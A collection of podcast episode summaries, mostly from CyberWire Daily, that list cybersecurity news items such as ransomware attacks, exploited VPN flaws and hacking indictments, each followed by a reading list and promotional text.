The DOJ indicts four Iranian nationals on hacking charges. Legislation to ban or force the sale of TikTok heads to the President's desk. A Russian hack group claims a cyberattack on an Indiana water treatment plant. A roundup of dark web data leaks. Mandiant monitors dropping dwell times. Bcrypt bogs down brute-forcing. North Korean hackers target defense secrets. On our Learning Layer segment, host Sam Meisenberg and Joe Carrigan continue their discussion of Joe's ISC2 CISSP certification journey. On our Industry Voices segment, Tony Velleca, CEO of CyberProof, joins us to explore some of the pain points that CISOs & CIOs are experiencing today, and how they can improve their cyber readiness. Ransomware may leave the shelves in Sweden's liquor stores bare.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guests Learning Layer On our Learning Layer segment, host Sam Meisenberg and Joe Carrigan continue their discussion of Joe's ISC2 CISSP certification journey using N2K's comprehensive CISSP training course, CISSP practice test, and CISSP practice labs. Sam and Joe discuss content and study strategies for CISSP Domain 3 Security Architecture and Engineering, and discuss encryption and non-repudiation. Specifically they cover sub-domain 3.6, "Select and determine cryptographic solutions," which includes: Cryptographic life cycle Cryptographic method Public key infrastructure (PKI). Industry Voices On our Industry Voices segment, Tony Velleca, CEO of CyberProof, joins us to explore some of the pain points that CISOs & CIOs are experiencing today, and how they can improve their cyber readiness.  Selected Reading Rewards Up to $10 Million for Information on Iranian Hackers (GB Hackers) Congress passes bill that could ban TikTok after years of false starts (Washington Post) Russian hackers claim cyberattack on Indiana water plant (The Record) Major Data Leaks from Honda Vietnam, US Airports, and Chinese Huawei/iPhone Users (SOCRadar® Cyber Intelligence Inc.) Global attacker median dwell time continues to fall (Help Net Security) New Password Cracking Analysis Targets Bcrypt (SecurityWeek) North Korean Hackers Target Dozens of Defense Companies (Infosecurity Magazine) ​​Hackers hijack antivirus updates to drop GuptiMiner malware (Bleeping Computer) Sweden's liquor shelves to run empty this week due to ransomware attack (The Record) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © 2023 N2K Networks, Inc.

We evaluate the leaked specs for Sony's upcoming PS5 Pro. Plus power demand from data centers is holding back AI development. What are the solutions? And US cybersecurity firm and Google subsidiary Mandiant said Wednesday that a hacking group with ties to the GRU was behind the January cyberattack that caused a tank at a water facility in Muleshoe, TX, to overflow.Starring Tom Merritt, Sarah Lane, Scott Johnson, Roger Chang, Joe.Link to the Show Notes.

We evaluate the leaked specs for Sony's upcoming PS5 Pro. Plus power demand from data centers is holding back AI development. What are the solutions? And US cybersecurity firm and Google subsidiary Mandiant said Wednesday that a hacking group with ties to the GRU was behind the January cyberattack that caused a tank at a water facility in Muleshoe, TX, to overflow. Starring Tom Merritt, Sarah Lane, Scott Johnson, Roger Chang, Joe. To read the show notes in a separate page click here! Support the show on Patreon by becoming a supporter!

President Biden is set to sign an executive order restricting overseas sharing by data brokers. US Federal agencies warn of exploited Ubiquiti EdgeRouters. A new ransomware operator claims to have hacked Epic Games. A cross-site scripting issue leaves millions of Wordpress sites vulnerable. The Rhysida ransomware group posts a multi-million dollar ransom demand on a Children's Hospital in Chicago. Mandiant tracks Chinese threat actors targeting Ivanti VPNs. The former head of DHS weighs in on a federal cyber insurance backstop. Domain Registrars offer bulk name blocking for brands. Our guest is Magpie Graham, Principal Adversary Hunter Technical Director at Dragos, reviews the key findings of Dragos' Cybersecurity Year in Review report. Cameo celebrities are taken out of context for political gains. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Guest Magpie Graham, Principal Adversary Hunter Technical Director at Dragos, reviews the key findings of Dragos' Cybersecurity Year in Review report. You can download a copy of the report here. To hear the full interview with Magpie, check out Control Loop.  Selected Reading Biden Executive Order Targets Bulk Data Transfers to China (GovInfo Security) FBI Alert: Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation (HACKREAD) Fortnite game developer Epic Games allegedly hacked (Cyber Daily) LiteSpeed Cache Plugin XSS Flaw Exposes 4M+ Million Sites to Attack (Cyber Security News) Ransomware gang seeks $3.4 million after attacking children's hospital (The Record) Chinese Cyberspies Use New Malware in Ivanti VPN Attacks (SecurityWeek) A Cyber Insurance Backstop (Schneier on Security) Cyberwar Podcast with Kate and Alex - Special Guest Michael Chertoff  Registrars can now block all domains that resemble brand names (BleepingComputer) Cameo is being used for political propaganda — by tricking the stars involved (NPR) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © 2023 N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

A zero-day hits Ivanti VPN customers. CISA highlights an active MS Sharepoint Server flaw. Cisco patches a critical vulnerability. Atomic Stealer gets updates. Sensitive school emergency planning documents are exposed online. The FCC reports on risky communications equipment. The White House will introduce new cybersecurity requirements for hospitals. Mandiant explains their X-Twitter hack. Our guest is Palo Alto Networks' Unit 42's David Moulton, host of the new Threat Vector podcast. And we are shocked - shocked! - to learn that an online sex for money scheme is a scam.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Guest David Moulton from Palo Alto Networks joins us to talk about Threat Vector. It's Unit 42's segment turned podcast on the N2K media network. Selected Reading Ivanti customers urged to patch vulnerabilities allegedly exploited by Chinese state hackers (The Record) CISA Urges Patching of Exploited SharePoint Server Vulnerability (SecurityWeek) Critical Cisco Unity Connection flaw gives attackers root privileges. Patch now! (CVE-2024-20272) (Help Net Security) Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload (The Hacker News) FCC's Reimbursement Program shows progress in removing national security risks from communication networks (Industrial Cyber) After Barrage of Hacks, Hospitals Will Face New Federal Cybersecurity Rules Tied to Funding (The Messenger) US School Shooter Emergency Plans Exposed in a Highly Sensitive Database Leak (WIRED) Mandiant's X Account Was Hacked in Brute-Force Password Attack (Infosecurity Magazine) Believing they would be paid a fortune for having sex with women, hundreds of Indian men scammed out of cash  (Graham Cluely) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © 2023 N2K Networks, Inc.

Sandworm was in Kyivstar's networks for months. Museums face online outages. Emsisoft suggests a ransomware payment ban. An ambulance service suffers a data breach. Mandiant's social media gets hacked. GXC Team's latest offerings in the C2C underground market. 23andMe blames their breach on password reuse. Lawyers are using outdated encryption.  On today's Threat Vector segment, David Moulton chats with Garrett Boyd,  senior consultant at Palo Alto Networks Unit 42  about the importance of internal training and mentorship in cybersecurity. And in Russia, holiday cheers turn to political jeers.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest On today's Threat Vector segment with David Moulton features Garrett Boyd, a senior consultant at Unit 42 by Palo Alto Networks with a background as a Marine and professor, discusses the importance of internal training and mentorship in cybersecurity. He provides insights into how training prepares professionals for industry challenges and how mentorship fosters professional growth and innovation. Garrett emphasizes the need for a mentorship culture in organizations and the responsibility of both mentors and mentees in this dynamic. The episode highlights the transformative impact of mentorship through personal experiences and concludes with an invitation for listeners to share their stories and a reminder to stay vigilant in the digital world. Threat Vector To learn what is top of mind each month from the experts at Unit 42 sign up for their Threat Intel Bulletin.  Selected Reading Compromised accounts and C2C markets. Cyberespionage and state-directed hacktivism. (CyberWire) Exclusive: Russian hackers were inside Ukraine telecoms giant for months (Reuters) Hackers linked to Russian spy agency claim cyberattack on Ukrainian cell network (reuters) Museum World Hit by Cyberattack on Widely Used Software (The New York Times) The State of Ransomware in the U.S.: Report and Statistics 2023 (Emsisoft) Nearly 1 million affected by ambulance service data breach (The Record) Mandiant's account on X hacked to push cryptocurrency scam (Bleeping Computer) Cybercriminals Implemented Artificial Intelligence (AI) For Invoice Fraud (Resecurity) 23andMe tells victims it's their fault that their data was breached (TechCrunch+) The Curious Case of MD5 (katelynsills) Firmware prank causes LED curtain in Russia to display ‘Slava Ukraini' — police arrest apartment owner (The Record) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © 2023 N2K Networks, Inc.